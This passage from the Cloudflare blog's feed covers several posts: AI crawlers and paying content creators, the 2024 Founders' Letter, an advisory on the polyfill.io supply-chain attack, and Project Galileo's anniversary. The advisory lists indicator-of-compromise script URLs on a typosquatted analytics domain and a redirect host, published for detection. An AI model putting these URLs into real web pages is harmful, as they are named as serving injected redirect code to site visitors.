in the past, you may have previously looked to Google. While it's still early, it seems clear that the interface of the future of the web will look more like ChatGPT than a spartan search box and ten blue links.</p><p>Google itself has changed. While ten years ago they presented a list of links and said that success was getting you off their site as quickly as possible, today they've added an answer box and more recently AI Overviews which answer users' questions without them having to leave Google.com. With the answer box, researchers have found that <a href="https://scrumdigital.com/blog/zero-click-search-trends-google-serp-analysis/"><u>75 percent</u></a> of mobile queries were answered without users leaving Google. With the more recent launch of AI Overviews it's even higher.</p><p>While Google’s users may like that, it's hurting content creators. Google still copies creators’ content, but over the last 10 years, because of the changes to the UI of “search” it's gotten almost 10 times more difficult for a content creator to get the same volume of traffic. That means it's 10 times more difficult to generate value from ads, subscriptions, or the ego of knowing someone cares about what you created.</p><p>And that's the good news. It’s even worse with <a href="https://blog.cloudflare.com/ai-search-crawl-refer-ratio-on-radar/#how-does-this-measurement-work"><u>today’s AI tools</u></a>. With OpenAI, it's 750 times more difficult to get traffic than it was with the Google of old. With Anthropic, it's 30,000 times more difficult. The reason is simple: increasingly we aren't consuming originals, we're consuming derivatives.</p><p>The problem is whether you create content to sell ads, sell subscriptions, or just to know that people value what you've created, an AI-driven web doesn't reward content creators the way that the old search-driven web did. And that means the deal that Google made to take content in exchange for sending you traffic just doesn't make sense anymore.</p><p>Instead of being a fair trade, the web is being stripmined by AI crawlers with content creators seeing almost no traffic and therefore almost no value.</p><p>That changes today, July 1, what we’re calling Content Independence Day. Cloudflare, along with a majority of the world's leading publishers and AI companies, is changing the default to <a href="https://www.cloudflare.com/learning/ai/how-to-block-ai-crawlers/">block AI crawlers</a> unless they pay creators for their content. That content is the fuel that powers AI engines, and so it's only fair that content creators are compensated directly for it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6GFFa6knU0nKGjhJVh8Ar8/8a1b4c0661146596cc844cdd9dd900ea/BLOG-2860_2.png" />
          </figure><p>But that's just the beginning. Next, we'll work on a marketplace where content creators and AI companies, large and small, can come together. Traffic was always a poor proxy for value. We think we can do better. Let me explain.</p><p>Imagine an AI engine like a block of swiss cheese. New, original content that fills one of the holes in the AI engine’s block of cheese is more valuable than repetitive, low-value content that unfortunately dominates much of the web today.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6vUAgbW7FzzHSKA8tB8f8c/ea78e7cb4858602a32a91523800b882c/BLOG-2860_3.png" />
          </figure><p>We believe that if we can begin to score and value content not on how much traffic it generates, but on how much it furthers knowledge — measured by how much it fills the current holes in AI engines “swiss cheese” — we not only will help AI engines get better faster, but also potentially facilitate a new golden age of high-value content creation.</p><p>We don’t know all the answers yet, but we’re working with some of the leading economists and computer scientists to figure them out.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1VNIoN0740jhfO8lu6XDpJ/98829d238884cde3bcd345779a15df89/BLOG-2860_4.png" />
          </figure><p>The web is changing. Its business model will change. And, in the process, we have an opportunity to learn from what was great about the web of the last 30 years and what we can make better for the web of the future.</p><p>Cloudflare's mission is to help build a better Internet. I'm proud of the role we're playing in doing exactly that as the web evolves. And I’m proud that we’re helping content creators stick up and demand value for the content they worked hard to create.</p><p>Happy Content Independence Day!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Xme0Af7HqeJpdQbapzApG/6ff9ea29b7506e10867ed9c7ac5a2280/BLOG-2860_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Pay Per Crawl]]></category>
            <category><![CDATA[AI Bots]]></category>
            <category><![CDATA[AI]]></category>
            <guid isPermaLink="false">1pmK0OnvzPIip01yjWXj0x</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2024 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2024-annual-founders-letter/</link>
            <pubDate>Sun, 22 Sep 2024 15:51:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched on September 27, 2010. This week we celebrate our fourteenth birthday ]]></description>
            <content:encoded><![CDATA[ <p>This week Cloudflare will celebrate the fourteenth anniversary of our launch. We think of it as our birthday. As is our tradition <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>ever since our first anniversary</u></a>, we use our Birthday Week each year to launch new products that we think of as gifts back to the Internet. For the last five years, we also take this time to write our <a href="https://blog.cloudflare.com/tag/founders-letter/"><u>annual Founders’ Letter</u></a> reflecting on our business and the state of the Internet. This year is no different.</p><p>That said, one thing that is different is you may have noticed we've actually had fewer public innovation weeks over the last year than usual. That's been because a <a href="https://blog.cloudflare.com/thanksgiving-2023-security-incident/"><u>couple</u></a> of <a href="https://blog.cloudflare.com/post-mortem-on-cloudflare-control-plane-and-analytics-outage/"><u>incidents</u></a> nearly a year ago caused us to focus on improving our internal systems over releasing new features. We're incredibly proud of our team's focus to make security, resilience, and reliability the top priorities for the last year. Today, Cloudflare's underlying platform, and the products that run on top of it, are <a href="https://blog.cloudflare.com/major-data-center-power-failure-again-cloudflare-code-orange-tested/"><u>significantly more robust than ever before</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16Eu23FEtjrfzUCYjwbWuh/0d8f35f2bbf4841862bebbeaf13e069d/pencil1.png" />
          </figure><p>With that work largely complete, and our platform in its strongest shape ever, we plan to pick back up the usual cadence of new product launches that we're known for. This Birthday Week, you'll see many as we roll out performance improvements only our Connectivity Cloud can deliver to accelerate all our customers' websites by a mind-blowing 45 percent (automatically and for free), launch new features to make our developer platform faster and easier to use, plug the web's last encryption hole, accelerate AI inference globally, provide new levels of support for startups and the open source community, and much much more.</p><p>This is easily our favorite week of the year because of how it allows our team to give back to the Internet and live up to our mission.</p>
    <div>
      <h2>Challenges for the Internet ahead</h2>
      <a href="#challenges-for-the-internet-ahead">
        
      </a>
    </div>
    <p>The robustness of Cloudflare's platform today contrasts with what feels like an Internet that has become far more fragile over the previous year. When we first articulated our mission as helping build a better Internet, we assumed that “better” meant one that was faster, more reliable, more secure, more private, and more efficient. But today it seems like something more fundamental.</p><p>The last year has been characterized by a normalization of <a href="https://blog.cloudflare.com/tag/internet-shutdown/">Internet shutdowns</a> and limits on Internet access around the world. What were once tactics reserved for authoritarian regimes have spread to even Western democratic nations, where courts and legislatures have been emboldened to restrict fundamental protocols to control perceived harms.</p><p>We’ve seen a dramatic uptick in courts of limited jurisdiction ordering sites they found objectionable blocked globally at the DNS level, nations turning off the Internet for most their citizens in the name of preventing cheating on standardized tests (while it remains on in wealthy and politically connected neighborhoods), ISPs proposing legislation to impose new taxes on content creators, and whole services being banned in countries that had previously declared that more Internet was always better than less. </p><p>This is, unfortunately, a dark time in the history of the Internet.</p>
    <div>
      <h2>AI’s Threat to Original Content Creation</h2>
      <a href="#ais-threat-to-original-content-creation">
        
      </a>
    </div>
    <p>At the same time, the business model of the web is eroding. The quid pro quo of the web’s last era — the search era — was that you let a company like Google scrape data from your website in exchange for them sending you traffic. In that model, content creators could then generate value from that traffic through ads, selling products, or just getting the ego boost of knowing that someone cares enough about the thing you created to take the time to view it.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2cMITvSWFI9yZpfwNC4hBU/4bd45d7fc413be97893e4a00bc096e2b/pen1.png" />
          </figure><p>That same quid pro quo does not hold up in the era we’re moving into — the AI era — where answers are delivered to questions without ever having to visit the authoritative source. And, if content creators can no longer generate value from their creations, it’s inevitable they’ll generate less content and we’ll all, including the AI companies that need original content to train their models, lose out as a result.</p>
    <div>
      <h2>Picking Up the Mantle</h2>
      <a href="#picking-up-the-mantle">
        
      </a>
    </div>
    <p>The Internet remains a miracle, but it no longer feels inevitable. It is under attack from active adversaries and beginning to rot from benign neglect. And, with the largest tech companies distracted by their own regulatory challenges, it finds itself without a clear champion. We’re proud of our team for picking up that mantle. At Cloudflare, we believe in the Internet and we will fight for it.</p><p>That's why we invest in our public policy team to educate lawmakers and jurists on how best to control the harms created by some limited corners of the Internet without destabilizing its underlying protocols. Why we believe it’s important to provide so many of our services for free. And it's why this Birthday Week we'll announce new ways for the AI systems that hunger for original content to compensate content creators in a way that is equitable. Without a new paradigm, we worry that the incentives that allowed the Internet to flourish will shrivel and its miracle will fade.</p><p>Missions matter. Ours is to help build a better Internet. We, or one of our senior executives, still talk to every candidate we hire before extending an offer because we want to ensure we communicate the importance of our mission. One of the most common questions we’re asked is how we plan to preserve Cloudflare's culture? Our answer is always the same: the goal isn't how to preserve our culture, it's always how to improve it. The same has to be true for the Internet. We can't just try to preserve the past, we need to imagine new ways to improve it.</p><p>That requires champions to stand up and imagine a better Internet. It’s been too long since you’ve read a positive story about the Internet even though it continues to be a miracle. We are proud that we have the team, platform, and mantle to not just preserve, but improve on, that miracle. It is our mission and what motivates everything we do at Cloudflare. And nowhere is that more on display than during the week ahead. If you too are inspired by our mission, we encourage you to <a href="https://www.cloudflare.com/careers/"><u>apply to join our team</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1LLnEP9Y10dOWw4NWAEcHe/700027bd46e496ff07c2910a3887b2cf/pen2.png" />
          </figure><p>Stay tuned for an incredible Birthday Week of new products that make progress on our mission. Thank you to our team around the world for everything you do. Cloudflare is stronger because of the work we've accomplished, and the Internet will be stronger because of Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6KvuXDwtmqb0nDoJqIWQWd/db265cb24d224458000d78a41cd55055/matthew-michelle.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">7puHT1ajSilk9b0LGo3s2H</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Automatically replacing polyfill.io links with Cloudflare’s mirror for a safer Internet]]></title>
            <link>https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/</link>
            <pubDate>Wed, 26 Jun 2024 20:23:41 GMT</pubDate>
            <description><![CDATA[ polyfill.io, a popular JavaScript library service, can no longer be trusted and should be removed from websites ]]></description>
            <content:encoded><![CDATA[ <p></p><p>polyfill.io, a popular JavaScript library service, can no longer be trusted and should be removed from websites.</p><p><a href="https://sansec.io/research/polyfill-supply-chain-attack">Multiple reports</a>, corroborated with data seen by our own client-side security system, <a href="https://developers.cloudflare.com/page-shield/">Page Shield</a>, have shown that the polyfill service was being used, and could be used again, to inject malicious JavaScript code into users’ browsers. This is a real threat to the Internet at large given the popularity of this library.</p><p>We have, over the last 24 hours, released an automatic JavaScript URL rewriting service that will rewrite any link to polyfill.io found in a website proxied by Cloudflare <a href="https://cdnjs.cloudflare.com/polyfill/">to a link to our mirror under cdnjs</a>. This will avoid breaking site functionality while mitigating the risk of a supply chain attack.</p><p>Any website on the free plan has this feature automatically activated now. Websites on any paid plan can turn on this feature with a single click.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5R0ht5q4fAwm8gm3a2Xe5U/6b3ec28498e76ff75e37b58f3673e49a/image1-22.png" />
            
            </figure><p>You can find this new feature under <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings">Security ⇒ Settings</a> on any zone using Cloudflare.</p><p>Contrary to what is stated on the polyfill.io website, Cloudflare has never recommended the polyfill.io service or authorized their use of Cloudflare’s name on their website. We have asked them to remove the false statement, and they have, so far, ignored our requests. This is yet another warning sign that they cannot be trusted.</p><p>If you are not using Cloudflare today, we still highly recommend that you remove any use of polyfill.io and/or find an alternative solution. And, while the automatic replacement function will handle most cases, the best practice is to remove polyfill.io from your projects and replace it with a secure alternative mirror like Cloudflare’s even if you are a customer.</p><p>You can do this by searching your code repositories for instances of polyfill.io and replacing it with <a href="https://cdnjs.cloudflare.com/polyfill/">cdnjs.cloudflare.com/polyfill/</a> (Cloudflare’s mirror). This is a non-breaking change as the two URLs will serve the same polyfill content. All website owners, regardless of the website using Cloudflare, should do this now.</p>
    <div>
      <h2>How we came to this decision</h2>
      <a href="#how-we-came-to-this-decision">
        
      </a>
    </div>
    <p>Back in February, the domain polyfill.io, which hosts a popular JavaScript library, was sold to a new owner: Funnull, a relatively unknown company. <a href="/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk">At the time, we were concerned</a> that this created a supply chain risk. This led us to spin up our own mirror of the polyfill.io code hosted under cdnjs, a JavaScript library repository sponsored by Cloudflare.</p><p>The new owner was unknown in the industry and did not have a track record of trust to administer a project such as polyfill.io. The concern, <a href="https://x.com/triblondon/status/1761852117579427975">highlighted even by the original author</a>, was that if they were to abuse polyfill.io by injecting additional code to the library, it could cause far-reaching security problems on the Internet affecting several hundreds of thousands websites. Or it could be used to perform a targeted supply-chain attack against specific websites.</p><p>Unfortunately, that worry came true on June 25, 2024, as the polyfill.io service was being used to inject nefarious code that, under certain circumstances, redirected users to other websites.</p><p>We have taken the exceptional step of using our ability to modify HTML on the fly to replace references to the polyfill.io CDN in our customers’ websites with links to our own, safe, mirror created back in February.</p><p>In the meantime, additional threat feed providers have also taken the decision to <a href="https://github.com/uBlockOrigin/uAssets/commit/91dfc54aed0f0aa514c1a481c3e63ea16da94c03">flag the domain as malicious</a>. We have not outright blocked the domain through any of the mechanisms we have because we are concerned it could cause widespread web outages given how broadly polyfill.io is used with some estimates indicating <a href="https://w3techs.com/technologies/details/js-polyfillio">usage on nearly 4% of all websites</a>.</p>
    <div>
      <h3>Corroborating data with Page Shield</h3>
      <a href="#corroborating-data-with-page-shield">
        
      </a>
    </div>
    <p>The original report indicates that malicious code was injected that, under certain circumstances, would redirect users to betting sites. It was doing this by loading additional JavaScript that would perform the redirect, under a set of additional domains which can be considered Indicators of Compromise (IoCs):</p>
            <pre><code>https://www.googie-anaiytics.com/analytics.js
https://www.googie-anaiytics.com/html/checkcachehw.js
https://www.googie-anaiytics.com/gtags.js
https://www.googie-anaiytics.com/keywords/vn-keyword.json
https://www.googie-anaiytics.com/webs-1.0.1.js
https://www.googie-anaiytics.com/analytics.js
https://www.googie-anaiytics.com/webs-1.0.2.js
https://www.googie-anaiytics.com/ga.js
https://www.googie-anaiytics.com/web-1.0.1.js
https://www.googie-anaiytics.com/web.js
https://www.googie-anaiytics.com/collect.js
https://kuurza.com/redirect?from=bitget</code></pre>
            <p>(note the intentional misspelling of Google Analytics)</p><p>Page Shield, our client side security solution, is available on all paid plans. When turned on, it collects information about JavaScript files loaded by end user browsers accessing your website.</p><p>By looking at the database of detected JavaScript files, we immediately found matches with the IoCs provided above starting as far back as 2024-06-08 15:23:51 (first seen timestamp on Page Shield detected JavaScript file). This was a clear indication that malicious activity was active and associated with polyfill.io.</p>
    <div>
      <h3>Replacing insecure JavaScript links to polyfill.io</h3>
      <a href="#replacing-insecure-javascript-links-to-polyfill-io">
        
      </a>
    </div>
    <p>To achieve performant HTML rewriting, we need to make blazing-fast HTML alterations as responses stream through Cloudflare’s network. This has been made possible by leveraging <a href="/rust-nginx-module">ROFL (Response Overseer for FL)</a>. ROFL powers various Cloudflare products that need to alter HTML as it streams, such as <a href="https://developers.cloudflare.com/speed/optimization/content/fonts/">Cloudflare Fonts,</a> <a href="https://developers.cloudflare.com/waf/tools/scrape-shield/email-address-obfuscation/">Email Obfuscation</a> and <a href="https://developers.cloudflare.com/speed/optimization/content/rocket-loader/">Rocket Loader</a></p><p>ROFL is developed entirely in Rust. The memory-safety features of Rust are indispensable for ensuring protection against memory leaks while processing a staggering volume of requests, measuring in the millions per second. Rust's compiled nature allows us to finely optimize our code for specific hardware configurations, delivering performance gains compared to interpreted languages.</p><p>The performance of ROFL allows us to rewrite HTML on-the-fly and modify the polyfill.io links quickly, safely, and efficiently. This speed helps us reduce any additional latency added by processing the HTML file.</p><p>If the feature is turned on, for any HTTP response with an HTML Content-Type, we parse all JavaScript script tag source attributes. If any are found linking to polyfill.io, we rewrite the src attribute to link to our mirror instead. We map to the correct version of the polyfill service while the query string is left untouched.</p><p>The logic will not activate if a Content Security Policy (CSP) header is found in the response. This ensures we don’t replace the link while breaking the CSP policy and therefore potentially breaking the website.</p>
    <div>
      <h3>Default on for free customers, optional for everyone else</h3>
      <a href="#default-on-for-free-customers-optional-for-everyone-else">
        
      </a>
    </div>
    <p>Cloudflare proxies millions of websites, and a large portion of these sites are on our free plan. Free plan customers tend to have simpler applications while not having the resources to update and react quickly to security concerns. We therefore decided to turn on the feature by default for sites on our free plan, as the likelihood of causing issues is reduced while also helping keep safe a very large portion of applications using polyfill.io.</p><p>Paid plan customers, on the other hand, have more complex applications and react quicker to security notices. We are confident that most paid customers using polyfill.io and Cloudflare will appreciate the ability to virtually patch the issue with a single click, while controlling when to do so.</p><p>All customers can turn off the feature at any time.</p><p>This isn’t the first time we’ve decided a security problem was so widespread and serious that we’d enable protection for all customers regardless of whether they were a paying customer or not. Back in 2014, we enabled <a href="/shellshock-protection-enabled-for-all-customers">Shellshock protection</a> for everyone. In 2021, when the log4j vulnerability was disclosed <a href="/cve-2021-44228-log4j-rce-0-day-mitigation/">we rolled out protection</a> for all customers.</p>
    <div>
      <h2>Do not use polyfill.io</h2>
      <a href="#do-not-use-polyfill-io">
        
      </a>
    </div>
    <p>If you are using Cloudflare, you can remove polyfill.io with a single click on the Cloudflare dashboard by heading over to <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/settings">your zone ⇒ Security ⇒ Settings</a>. If you are a free customer, the rewrite is automatically active. This feature, we hope, will help you quickly patch the issue.</p><p>Nonetheless, you should ultimately search your code repositories for instances of polyfill.io and replace them with an alternative provider, such as Cloudflare’s secure mirror under cdnjs (<a href="https://cdnjs.cloudflare.com/polyfill/">https://cdnjs.cloudflare.com/polyfill/</a>). Website owners who are not using Cloudflare should also perform these steps.</p><p>The underlying bundle links you should use are:</p><p>For minified: <a href="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js">https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js</a>
For unminified: <a href="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.js">https://cdnjs.cloudflare.com/polyfill/v3/polyfill.js</a></p><p>Doing this ensures your website is no longer relying on polyfill.io.</p> ]]></content:encoded>
            <category><![CDATA[CDNJS]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[Application Services]]></category>
            <category><![CDATA[Supply Chain Attacks]]></category>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">3NHy1gOkql57RbBcdjWs5g</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>John Graham-Cumming</dc:creator>
            <dc:creator>Michael Tremante</dc:creator>
        </item>
        <item>
            <title><![CDATA[Celebrating 10 years of Project Galileo]]></title>
            <link>https://blog.cloudflare.com/celebrating-10-years-of-project-galileo/</link>
            <pubDate>Wed, 12 Jun 2024 13:00:49 GMT</pubDate>
            <description><![CDATA[ On its 10th anniversary, Cloudflare's Project Galileo continues to offer free security services to over 2,600 journalists and nonprofits globally, supporting human rights and democracy. ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1nSpJ5IcewxQNWxMluA2Ra/00de9f546ce24838099ca0f7eaf35e18/image--17--1.png" />
            
            </figure><p>One of the great benefits of the Internet has been its ability to empower activists and journalists in repressive societies to organize, communicate, and simply find each other. Ten years ago today, Cloudflare launched Project Galileo, a program which today provides security services, at no cost, to more than 2,600 independent journalists and nonprofit organizations around the world supporting human rights, democracy, and local communities. You can read last week’s <a href="/galileo10anniversaryradardashboard">blog</a> and <a href="https://radar.cloudflare.com/reports/project-galileo-10th-anniv?cf_target_id=712A46674D7CB372A408DAE616C00495">Radar dashboard</a> that provide a snapshot of what public interest organizations experience on a daily basis when it comes to keeping their websites online.</p><div>
  
</div>
<p></p>
    <div>
      <h3>Origins of Project Galileo</h3>
      <a href="#origins-of-project-galileo">
        
      </a>
    </div>
    <p>We’ve admitted before that Project Galileo was born out of a mistake, but it's worth reminding ourselves. In 2014, when Cloudflare was a much smaller company with a smaller network, our free service did not include DDoS mitigation. If a free customer came under a withering attack, we would stop proxying traffic to protect our own network. It just made sense.</p><p>One evening, a site that was using us came under a significant DDoS attack, exhausting Cloudflare resources. After pulling up the site and seeing Cyrillic writing and pictures of men with guns, the young engineer on call followed the playbook. He pushed a button and sent all the attack traffic to the site’s origin, effectively kicking it off the Internet.</p><p>This was in 2014, during Russia’s first invasion into Ukraine, when Russia invaded Crimea. What the engineer did not know was that he had just kicked off an independent Ukrainian newspaper that was covering the attack and the invasions. The newspaper had tried to pay for services with a credit card but failed because Russia had targeted Ukraine’s financial infrastructure, taking banking institutions offline. It wasn’t the engineer’s fault. He had no reason to know that the site was important, and no alternative playbook to follow.</p><p>After that incident, we vowed to never let an organization that was serving such an important purpose go offline simply because they couldn’t pay for services. And so the idea for Project Galileo was born.</p><p>Although the idea of providing free security services was straightforward, figuring out which organizations are important enough to deserve such services was not. We know we can’t build a better Internet alone – it’s why Cloudflare’s mission is to <i>help</i> build a better Internet. So with Project Galileo, we sought the assistance of a group of civil society organizations to partner with us and help identify the organizations that need our protection.</p><p>Repression of ideas that were threatening to authority hardly started with DDoS attacks or the invention of the Internet. We named the effort Project Galileo after the story of Galileo Galilei. Galileo was persecuted in the 1600s for publishing a book concluding that the Earth was not at the center of the universe, but that the Earth orbits the sun. After Galileo was labeled a heretic, his book was banned and his ideas were suppressed for more than 100 years.</p><p>Four hundred years after Galileo, we see attempts to suppress the online voices of journalists and human rights workers who might challenge the status quo. We’re proud of the fact that through Project Galileo, we keep so many of those voices online.</p><div>
  
</div>
<p></p>
    <div>
      <h3>Growth of Project Galileo</h3>
      <a href="#growth-of-project-galileo">
        
      </a>
    </div>
    <p>Ten years after the launch of Project Galileo, Cloudflare has changed a lot. Our network has grown from data centers in fewer than 30 cities in 2014 to a network that runs in 320 cities and more than 120 countries. We’ve massively expanded our product suite to include whole new lines of products, including a full set of <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> services and a developer suite that enables developers to build a wide range of applications, including AI applications, on our network.</p><p>As Cloudflare has grown, so has Project Galileo. We have more than quadrupled the number of entities we protect in the last five years, from 600 at Project Galileo’s five-year anniversary to more than <a href="/galileo10anniversaryradardashboard">2,600 today</a>, located in 111 different countries. We’ve expanded from our original 14 civil society partners to 54 today. Our partners span countries, continents, and subject matter areas, sharing their expertise on organizations that would benefit from cybersecurity assistance.</p><p>When we expand our product offerings, we routinely ask whether new services would be valuable to the journalists, humanitarian groups, and nonprofits that benefit from Project Galileo. After Cloudflare launched our Zero Trust offering, we <a href="/cloudflare-zero-trust-for-galileo-and-athenian">announced</a> that we would offer those services for free to participants in Project Galileo to protect themselves against threats like data loss and malware. After Cloudflare acquired Area 1, we announced that we would offer Cloudflare’s email security products for free to the same participants.</p><p>We’ve tried to make our products easy for a small organization to use, building a <a href="https://www.cloudflare.com/impact-portal/">Social Impact Portal</a> and a <a href="https://cf-assets.www.cloudflare.com/slt3lc6tev37/4R2Wyj1ERPecMhbycOiPj8/c30f3e8502a04c6626e98072c48d4d7b/Zero_Trust_Roadmap_for_High-Risk_Organizations.pdf">Zero Trust roadmap</a> for civil society and at-risk communities. Cloudflare’s teams also help participants onboard and troubleshoot when they face challenges.</p>
    <div>
      <h3>What Project Galileo means for civil society groups now</h3>
      <a href="#what-project-galileo-means-for-civil-society-groups-now">
        
      </a>
    </div>
    <p>On June 6, we celebrated Project Galileo’s 10-year anniversary with partners from government, civil society, and industry at an event in Washington, DC. We used the opportunity to talk about the future of the Internet, and how we can all work together to protect and advance the free and open Internet.</p><p>For humanitarian organizations with few resources, the types of services offered under Project Galileo can be life changing. At our Project Galileo event, we heard the story of a small French nonprofit that lost 17 years of data after being targeted by ransomware. Our resources help organizations defend themselves not only against nation states determined to take them offline, but also against common ransomware and <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/">phishing</a> attacks.</p><p>During our event, the President of the <a href="https://www.ned.org/">National Endowment for Democracy (NED)</a> told the story of traveling in the Western Balkans where the struggle for an independent media is palpable. NED is a strong supporter of media outlets across the region. But those media outlets come under frequent cyber attacks that have incapacitated their websites. As described by Damon Wilson:</p><blockquote><p><i>Those attacks prevent news from reaching the public, where information is very much something that is used and weaponized against communities across Bosnia. And this was precisely the case with one of our partners, Buka. It's a news outlet that's based in Banja Luka and Republika Srpska. And while I was there, I met with some of our partners from Banja Luka who had been physically beaten up and intimidated. There's a crackdown on civil society, new restrictions and laws against them. But for Buka, it was a little bit of a different scenario because earlier this year they suffered a DDoS attack, during which their server servers were overwhelmed by up to 700 million page requests. And the sheer volume suggests the attackers had significant resources, making it a particularly severe threat.</i></p><p><i>But by onboarding Buka into Project Galileo, we were able to help them restore their site’s functionality, and now Buka’s website is equipped to withstand even the most sophisticated attacks, ensuring that their critical reporting continues uninterrupted, exactly at the time when the Republic gets Covid, Republika Srpska government is looking to close and restrict independent civic voices in that part of Bosnia.</i></p><p><i>And this is just one example. Last week, traveling in Bosnia, of the numerous NED partners who've benefited from Cloudflare's Project Galileo since NED became a partner in 2019, it's profound to the efficacy of our partners’ work. It effectively ensures that bad actors can't silence the voices and the work of democracy advocates and independent media around the world.</i></p></blockquote>
    <div>
      <h3>The importance of collaboration</h3>
      <a href="#the-importance-of-collaboration">
        
      </a>
    </div>
    <p>Our work with Project Galileo highlights the power of the partnerships that we’ve built, not only with civil society, but with government and industry partners as well. By working together, we can expand protections for the many at-risk organizations that need cybersecurity assistance. Cybersecurity is a team sport.</p><p>In 2023, one of our Project Galileo partners, the <a href="https://cyberpeaceinstitute.org/">CyberPeace Institute</a>, approached us about doing even more to help protect nonprofit organizations against phishing attacks. The CyberPeace Institute collaborates with its partners to reduce the harms from cyberattacks on people’s lives worldwide and provide them assistance. CyberPeace also analyzes cyberattacks to expose their societal impact, to demonstrate how international laws and norms are being violated, and to advance responsible behavior in cyberspace.</p><p>CyberPeace realized that there was an opportunity to document attacks against civil society groups and improve the ecosystem for everyone. Many development and humanitarian organizations are small, with limited staff and little cybersecurity experience. They can easily fall prey to common cyber attacks – like phishing – designed to access their systems or steal their data. If they manage to use tools effectively to defend themselves, they do not typically report on the information about the attacks they see.  </p><p>CyberPeace proposed to help onboard development and humanitarian organizations to Cloudflare services through their <a href="https://cpb.ngo/">CyberPeace Builders program</a> and analyze the phishing campaigns targeting those organizations. The substantive insights and information gained from that work could then be fed to other civil society organizations as real time security alerts. Cloudflare worked with CyberPeace to develop the new approach, enabling their volunteers to onboard organizations in their network to Area 1 tools and their analysts to access threat indicators from the collective organizations onboarded.  </p><p>Government can play an important role in helping protect civil society from cyberattacks as well. Since the <a href="https://www.state.gov/summit-for-democracy/">Summit for Democracy</a> last year, Cloudflare has been working closely with the Joint Cyber Defense Collaborative (JCDC), which is run by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), on their High-Risk Communities initiative. Earlier this year, JCDC launched a <a href="https://www.cisa.gov/audiences/high-risk-communities">web page</a> outlining cybersecurity resources for civil society communities facing digital security threats because of their work. The effort includes <a href="https://www.cisa.gov/audiences/high-risk-communities/cybersecurity-resources-high-risk-communities">tools and services</a> that nonprofits can use to secure themselves online, including those offered under Project Galileo.</p>
    <div>
      <h3>Expanding Cloudflare’s Impact</h3>
      <a href="#expanding-cloudflares-impact">
        
      </a>
    </div>
    <p>In many ways, the creation of Project Galileo altered the trajectory of the company. Project Galileo cemented the idea that protecting and keeping important organizations online, regardless of whether they could pay us, was part of Cloudflare’s DNA. It pushed us to innovate to improve security not only for the large enterprises that pay us, but for the small organizations doing good for the world that cannot afford to pay for the latest technological innovation. It gave us our mission – to help build a better Internet – and a standard to live up to and measure ourselves against.</p><p>To meet that standard, we routinely reach out to offer our services to important organizations in need. In 2022, after Russia’s invasion of Ukraine, Cloudflare jumped in to offer services to Ukrainian critical infrastructure facing a barrage of cyberattacks and have continued providing them services ever since. At our Project Galileo event, the State Department’s Special Envoy and Coordinator for Digital Freedom read an email she’d received from Ukraine’s Deputy Foreign Minister and Chief Digital Transformation officer of Ukraine the night before:</p><blockquote><p><i>It is absolutely definite that Cloudflare services provide a vital layer of cybersecurity within the Ukrainian segment of cyberspace. Numerous DDoS attacks are directed at state electronic services, fintech, official information sources. So if there was no Cloudflare as a proven protection against DDoS attacks, it would have serious consequences causing chaos, especially when these attacks are synchronized by the enemy in parallel with kinetic attacks.</i></p></blockquote><p>We’ve <a href="/announcing-cloudflare-radar-outage-center">launched</a> sections of Cloudflare Radar designed to use Cloudflare’s network to help civil society monitor Internet outages and disruptions, as well as route hijacks and other traffic anomalies. We’ve participated in the <a href="https://freedomonlinecoalition.com/task_forces_and_wg/task-force-on-internet-shutdowns/">Freedom Online Coalition’s Task Force on Internet Shutdowns</a>.</p><p>Project Galileo also helped pave the way for a variety of Cloudflare projects to provide other at-risk populations free services. These programs include:</p><ul><li><p><a href="https://www.cloudflare.com/athenian/"><b>Athenian Project</b></a>: Launched in 2017, the Athenian Project is Cloudflare’s program to protect election-related domains for state and local governments so that citizens have reliable access to information on voter registration, polling places, and the reporting of election results.</p></li><li><p><a href="https://www.cloudflare.com/campaigns/"><b>Cloudflare for Campaigns</b></a>: Launched in 2020, Cloudflare for Campaigns helps secure US political candidates’ election websites and internal data while also ensuring site reliability during peak traffic periods. The program is run in partnership with Defending Digital Campaigns.</p></li><li><p><a 